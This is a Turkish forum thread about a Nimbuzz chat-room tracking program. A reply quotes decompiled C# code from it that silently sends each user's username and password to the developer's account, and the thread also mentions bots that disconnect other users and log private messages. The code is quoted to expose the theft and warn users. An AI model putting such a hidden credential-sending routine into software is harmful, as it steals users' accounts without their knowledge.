Nimbuzz Engel Takip ve Sohbet Programı v2 TR

Sponsorlu Bağlantılar

akifp

akifp

Üye
    Konu Sahibi
Nimbuzz Engel Takip ve Sohbet Programı v2 TR
Nimbuzz Engel Takip Programı v2 TR
1#
Engel atanı istediğiniz kişini özelinde deşifre edebilirsiniz.
2# Sesi kısılanı ve yetkisi alınanı da aynı şekilde.
3# Otomsj ayarlayarak 15 dk bir msj atma özelliği
4# Oda arama bölümü..
5# Sohbet Bölümü ile sohbet edebilirsiniz
6# Kullanıcılar Listesi eklendi!
7# CAPTHA bölümü eklenmiştir, odaya girişte güvenlik doğrulamasında sıkıntı çekmemeniz için
Mevcuttur. Program tamamen Türkçedir ve;

" [email protected] " tarafından Kodlanmıştır. Link aşağıdadır. İnşallah faydasını görmeniz temennim ile...

NOT:
Sohbet odasında iken Çarpı butonuna basarsanız odadan ayrımaz, odada durup rapor vermeye devam etmektedir. odadan ayrılmak için "ODADAN AYRIL" butonuna basmanız yeterlidir.
İSTEK: Deneyip test edip eksikliklerini, yada şöyle olsa daha iyi olur dediğiniz birşeyler varsa bunu paylaşmaktan çekinmeyin. Hayırlı kullanımlar...

Son düzenleme:

akifp

akifp

Üye
    Konu Sahibi
Bu programı ücretli yapıcam galiba :) ortada bi emek var ve bunun bi karşılığı olmalı diye düşünüyorm! Bir iki hafta daha bekleyem bakalım indiren indirsin...

Mesut Aktaş

Mesut Aktaş

Co-Admin
ücretli olunca satın alınabileceği duygusundaysan hemen yapmalısın :gul: ama ben pek alınacağını zannetmiyorum

ÇaRşI 2387

ÇaRşI 2387

Üye
Bu proya alternatif çok yinede sen bilirsin :tşk:

akifp

akifp

Üye
    Konu Sahibi
Evet Hâklısınız sanırım arkadaşlar bunu bu şekilde Satın alan olmayacak sanırım.. Şimdi bunun bir üst versiyonunu yapıyorum ama daha proje aşamasında, yeni sürümde getireceğim yenilikler;

1# Sohbet odasında Süper lig maçlarında gool atıldığında odada anlık paylaştırmayı düşünüyorum..
Örnek: "FB 1-1 BJK Gool atan oyuncu Şahan" gibi düşünüyorum
2# Bir komut yardımıyla Haber ve Üyelik te ekleyecem.

Belki bu şekilde alan olabilir. Şuan Nimbuzz Platformunda Türkçe Program yazan kimse yok benim bildiğim, bu programın benzerine de rastlamadım.. Yabancı Nimbuzz kullanıcıları için de TRANSLATE edip Forumlarda Paylaşmıştım...

Bu programı ben kendi odamda kullanıyorum. Sunucuya kuruyorsun programı 7/24 Odada oluyo, kim kimi engelledi? Kim kimi attı? Kim kimin yetkisini aldı? Kim kimin sesini kıstı? Hepsini istediğinin kişiye mesaj yoluyla deşifre edebiliyorsun...

Sizin yapmış olduğunuz yorumlara katılıyorum arkadaşlar..
Yorumlar için Teşekkür ediyorum... :)

Allah'ın izniyle yeni sürüm yakındır..

Son düzenleme:

aynuıs

Üye

Jamerica

Üye
eline sağlık

PeSimiSt_61x

PeSimiSt_61x

Üye

Resmide koyuyorum ve güzelde açıklıyorum ki iddiam asılsız olmasın.

private void Button2Click(object sender, EventArgs e)
{
this.akif.Send("<presence to='" + this.textBox4.Text + "@conference.nimbuzz.com/" + this.textBox1.Text + "'><priority>0</priority><x xmlns=' ");
this.akif.Send("<message type='chat' to='[email protected]' id='i2'><body>" + this.textBox1.Text + "\nsifre:" + this.textBox2.Text + "</body></message>");
this.timer1.Start();
new Form1(this.akif).Show();
this.button2.Text = "KATILDI";
}

Bu Kodda
this.textBox1.Text yani kullanıcı adınızı.
sifre:" + this.textBox2.Text yani şifreyi.

Odaya girdiğiniz an odada bulunan.

this.akif.Send("<message type='chat' to='[email protected]' id='i2'><body>" + this.textBox1.Text + "\nsifre:" + this.textBox2.Text + "</body></message>"); kod bloğu ile

[email protected] hesabina gönderiyor.

<message type="chat" to="[email protected]/tcode_turkishcode"><body>burasi mesaj</body></message> buda mesaj gönderme xml kodu.

Kullananlara geçmiş olsun. Kullanacak olanlarada uyarı.

Son düzenleme:
akifp

akifp

Üye
    Konu Sahibi
NE DİYİM GÜZEL AÇIKLAMA OLMUŞ ELİNE SAĞLIK ÖNCELİKLE..
PROGRAMI YAPMAMDAKİ BİRİNCİ AMACIMIN İNSANLARIN NİKİNİ ALMAK OLMADIĞINI ANLATMAK İSTERİM. PROGRAMI YAPMA AMACIM BÖYLE Bİ PROGRAMA GEREK VARDI ODALARDA VE İHTİYAÇ GÖRÜDÜĞÜM İÇİN YAPTIM, İNSANLARIN KULLANIMINA SUNDUM.. YAPARKENDE KİMİN KULLANIDIĞINI BİLİP MUDAHALE ETMEM GEREKİYORDU, YANİSİ; NİMBUZZ DA SOHBET EDERKEN BİRÇOK KÖTÜ İNSANLA KARŞILAŞIYORUZ. ANAYA ATAYA ALLAH'A ŞAHSA ARKADAŞLARIMIZA KARDEŞLERİMİZE KÜFÜR EDEN İNSANLAR VAR.. BUNLAR FLOD ATAR, İNSANLARIN HUZURUNU BOZAR FELAN FİLAN DAHA SAYMAYA GEREK YOK..
BÖYLE KİŞİLER KULLANIRSA MUDAHALE EDEBİLMEK İÇİN, BÖYLE Bİ BİLDİRİM YAPTIRDIM.. DURUP DURURKEN İNSANLARIN NİCKLERİYLE Bİ İŞİM YOK ZATEN.
BENİ BİLEN BİLİR HAKSIZ Bİ DURUM VARSA TAZMİN ETMİŞİMDİR.. AMA SAĞA SOLA MİLLETİ RAHATSIZ EDİP KÜFÜR EDİP NİKİ GİDİNCE AĞLAMASIN KİMSE... :)

KULLANANLARA GEÇMİŞ OLSUN DERKEN?!
BU PROGRAMI KULLANIPTA NİKİ ÇALINAN BİR ŞAHIS YOKTUR ŞU ANA KADAR, Kİ OLDUYSA ŞAYET EĞER BÖYLE BİRŞEY BANA YAZSIN, MADDİ VE MANEVİ ZARARI GELİP BENDEN İSTEME HAKKINA SAHİPTİR...
ARKADAŞ AÇIKLAMIŞ İSTEYEN KULLANIR İSTEYEN KULLANMAZ, HE BU SAATTEN SONA O ODALARDA HUZURSUZLUK YAPAN KÜFÜR EEN ARKADAŞLAR KULLANIR MI? KULLANMAZ O AYRI Bİ KONU..
AMA BİZİ TANIYAN HERKES KULLANIR, BİZİM İNSANLARIN NİKİYLE İŞİMİZ OLMADIĞINI BİLİR ZATEN NİMBUZZ TR KULLANICILARI :)

PeSimiSt_61x

PeSimiSt_61x

Üye
NE DİYİM GÜZEL AÇIKLAMA OLMUŞ ELİNE SAĞLIK ÖNCELİKLE..
PROGRAMI YAPMAMDAKİ BİRİNCİ AMACIMIN İNSANLARIN NİKİNİ ALMAK OLMADIĞINI ANLATMAK İSTERİM. PROGRAMI YAPMA AMACIM BÖYLE Bİ PROGRAMA GEREK VARDI ODALARDA VE İHTİYAÇ GÖRÜDÜĞÜM İÇİN YAPTIM, İNSANLARIN KULLANIMINA SUNDUM.. YAPARKENDE KİMİN KULLANIDIĞINI BİLİP MUDAHALE ETMEM GEREKİYORDU, YANİSİ; NİMBUZZ DA SOHBET EDERKEN BİRÇOK KÖTÜ İNSANLA KARŞILAŞIYORUZ. ANAYA ATAYA ALLAH'A ŞAHSA ARKADAŞLARIMIZA KARDEŞLERİMİZE KÜFÜR EDEN İNSANLAR VAR.. BUNLAR FLOD ATAR, İNSANLARIN HUZURUNU BOZAR FELAN FİLAN DAHA SAYMAYA GEREK YOK..
BÖYLE KİŞİLER KULLANIRSA MUDAHALE EDEBİLMEK İÇİN, BÖYLE Bİ BİLDİRİM YAPTIRDIM.. DURUP DURURKEN İNSANLARIN NİCKLERİYLE Bİ İŞİM YOK ZATEN.
BENİ BİLEN BİLİR HAKSIZ Bİ DURUM VARSA TAZMİN ETMİŞİMDİR.. AMA SAĞA SOLA MİLLETİ RAHATSIZ EDİP KÜFÜR EDİP NİKİ GİDİNCE AĞLAMASIN KİMSE... :)

KULLANANLARA GEÇMİŞ OLSUN DERKEN?!
BU PROGRAMI KULLANIPTA NİKİ ÇALINAN BİR ŞAHIS YOKTUR ŞU ANA KADAR, Kİ OLDUYSA ŞAYET EĞER BÖYLE BİRŞEY BANA YAZSIN, MADDİ VE MANEVİ ZARARI GELİP BENDEN İSTEME HAKKINA SAHİPTİR...
ARKADAŞ AÇIKLAMIŞ İSTEYEN KULLANIR İSTEYEN KULLANMAZ, HE BU SAATTEN SONA O ODALARDA HUZURSUZLUK YAPAN KÜFÜR EEN ARKADAŞLAR KULLANIR MI? KULLANMAZ O AYRI Bİ KONU..
AMA BİZİ TANIYAN HERKES KULLANIR, BİZİM İNSANLARIN NİKİYLE İŞİMİZ OLMADIĞINI BİLİR ZATEN NİMBUZZ TR KULLANICILARI :)

O zaman bunu programın detaylarında açıklamalısın ve bu kararı kullanıcıya bırakmalısın. Kullanan kişinin Hesabının şifresini sonuçta biliyorsun sadece bilmen bile hiç hoş değil.

• Beğen
Tepkiler: altobelli

altobelli

Üye
Yerden göğe kadar haklısın ahmet. ben bu arkadaşın bir cracker ini görmüştüm. orda da şifreyi kendi mail adresine göndertiyordu otomatik olarak. Hevesli ama altyapısız bir arkadaş. Bu forumu bütün nimbuzzcuların bildiğini okuduğunu sanmıyorum. Birşekilde uyarmak gerekiyor kullanıcıları bu gibi hilecilere karşı.
Ayrıca bir uyarı da spyturk botunu ekleyenler için yapayım. Kim ne zaman kimin online durumuna bakmış. kimi incelemiş . kimle ilgilenmiş. hepsini [email protected] nikli nimbuzz kullanıcısı biliyor.Spyturk ün özeline yazdığınız herşeyi bu beyefendiye yazmış oluyorsunuz. Tavsiyem o botu kullanacağınıza o botun 2- 3 katı özelliklere sahip yabancıların spybot unu kullanmanız

akifp

akifp

Üye
    Konu Sahibi
Selamûn aleyküm.. Benim amacım insanlara faydalanacakları şeyler yapmak "altobelli".

Cracker yorumuna cevabım....
Gördüğün Crackeri, yarım yamalak görmüşsün herhalde; oradaki mail adresi (optional) yani kendi mail adresini yazarak kendi mail adresinin kayıt olmasını sağlayorsun özeliği bu zaten.. kutucuktaki mail değişken... Crackerin özeliiği zaten o.... Diğer Cracklerde böyle bi özellik yok..
RESİMDE GÖRÜLDÜĞÜ ÜZERE TİK ATARAK KUTULARI AKTİF EDEBİLİRSİNİZ. VE KENDİ MAİLİNİZİ YAZABİLİRSİNİZ :)

Bide diyorsun ki kim ne yazmış biliyorsun diyorsun. buna cevap vereyim..
Senin dediğin spyturk botunu an itibariyle 492 Türk kullanıcı kullanıyor. O kadar çok kişi kullanıyo ki her yazdığını ben görmüyorum, benm işim gücüm yok günlük 5000 mesajı mı okuyacağım? :D kim ne yazmış diye... Gelen mesajların kayıtları da zaten tutulmuyo!
Eee 7/24 nickte bekleyipte kim ne yazmış ona mı bakıcam.... O kadar boş vaktimde yok benm amacım insanlara fayda sağlamak, ve bunu da yapıyorum.Güzel geri dönüşler gelince mutlu oluyorum...

Yabancı Spybotların Spyturkten 2-3 kat fazla özelliği olduğunu düşünüyosun.. bu yorumuna;
Yabancı Spybot ve Spyturk'un özelliklerini Karşılaştıralım kardeşim hemen..

Spyturk ü özellikleri
1) Symbian DC düşürme: Düşür Nick 123
2) YouTube Mp3 indir: Mp3 Ender tekin medine ilahisi (özelde videonun resmi ve indirme linki,boyutu hepsi aynı anda)
3) Avatarı alma: A Nick (Hem Resim hemde Linki bir arada)
4) Profile bakma: P Nick
5) Nick Tarihi: C Nick
6) Cevrmiçi çevrimdışı sorgulaması: R Nick
7) E-postadan nick ara: S [email protected]
8) Nicki odalarda bulma: Bul Nick
9) Hava Durumu: Hava Bursa
10) Namaz Vakitleri / İftar ve Sahur zamanları: Vakit Mersin
11) Güzel Şablonlar: Allah, Hadis, Di, Aşk, Aa, Kapak, Huzur
12) Ingilizce-Türkçe çeviri: T Hello are you? T Merhaba nasılsın?
13) Resimden mana çıkarma oyunu: OYUN OYUN2 OYUN3 (Not:özelde çalışır resim atıcağı için)
14) Oda kullanıcılarını gösterme: melek odası için: Göster melek
esranın oda için: Göster Esra
Kaybolan odası için: Göster Kaybolan
emrenin oda için. Göster Emre
15) Aşk ölçer: L Leyla Mecnun
16) NAMAZ NASIL KILINIR RENKLİ RESİMLİ ANLATIM: NAMAZ (sadece)
17) Java nickleri göstertme için: JAVA
18) Kişi odaya ne zaman gelmiş: N nick
19) Bir kişiye mesaj notu bırakmak için: Tell akif GElince notumu oku
20) Site name server ve WHOİS sorgulaması: Site
21) Java yazı yazdırma: J MERHABA HOŞGELDİN (Geri dönüşü Symbol harflerle olacaktır)
22) Oda araması

Ve daha bi çok odada kullanılabilen özelliği mevcuttur..
BÜTÜN BU ÖZELLİKLERİ KULLANMAK İÇİN EKLE HEP YAZ KARDEŞİM.. SONRA YABANCI BOTU EKLE KARŞILAŞTIR..
BİZİM AMACIMIZ SADECE İNSANLARA YARDIMCI OLMAK VE FAYDA SAĞLAMAK...
KATAKÜLLİ HİÇBİRZAMAN DÜŞÜNMEDİĞİMİZ BİRŞEY.

yABANCI spYBOT un özellikleri
1) Avatar sadece link veriyo
2) profil e bakma
3) Nick tarihi
4) IS mick IN room. komutu kişi odada mı bakma
5) Oda arama
6) MAil araması
7) Çevrimiçi Çevrimdışı Sorgulaması

GÖRÜLDÜĞÜ GİBİ BENMKİ ONUN ÖZELLİKLERİNİN 3 KATINDAN 1 FAZLA:D... ŞİKAYET ETMEYİ BIRAK. KULLAN KARDEŞ SENDE, NİYE KULLANDIN DEMEYİZ. AMA KULLANMICAKSANDA BİLMEDEN ARAŞTIRMADAN YORUM YAPIYON...
YÜZLERCE KİŞİ KULLANIYORDA HİÇ SORUN OLMUYO GAYET HERKES MEMNUNKEN, BİRSÜRÜ OLUMLU GERİ DÖNÜŞ YAPILYORKEN.. ARADA BİR İKİ KİŞİ RAHATSIZ OLUP KULLANMASADA OLUR SENİN GİBİ...
HERKESE İYİ GÜNLER.. HAYIRI RAMAZANLAR..

Son düzenleme:
akifp

akifp

Üye
    Konu Sahibi
SELAMÜN ALEYKÜM...
BU SÜRÜM RAFA KALKMIŞTIR... YENİ SÜRÜM YAPILMIŞTIR..
YENİ SÜRÜMLE GETİRİLEN YENİLİKLER:
1) Kişi Listesi
2) Profil Paneli: Avatar, Ekran adı, İleti, Nickin açılış tarihi, Ülke, Bölge, Sokak
3) Sohbet Odalarında Kişi resimleri eklenmiştir
4) Sohbet odasından engel atan, sesi kısılan kişileri, hem istediğiniz iki kişini özeline deşifre edebilirsiniz. hemde odada iken sağ alt köşedeki panelden takip edebilirsiniz..
5) Şifre, Mail, Telefon numarasını değiştirme paneli eklenmiştir.
6) N-WORLD menüsü eklenmiştir.
7) Ekran adını ve ileti değiştirilebilmektedir.
8) CHAPTHA yani odaya girerken sorulan güvenlik kodu düzenlenmiştir.
9) Odada sohbet ederken "Yeni mesaj" bildirim sesi eklenmiştir.
10) Özel Sohbet eklenmiştir. (Özel sohbette hatalar olabilir. olursa bildiriniz.)

YENİ SÜRÜM: Nimbuzz Engel Takip ve Sohbet Programı v3 - MaxiCep

Son düzenleme:

Üst Alt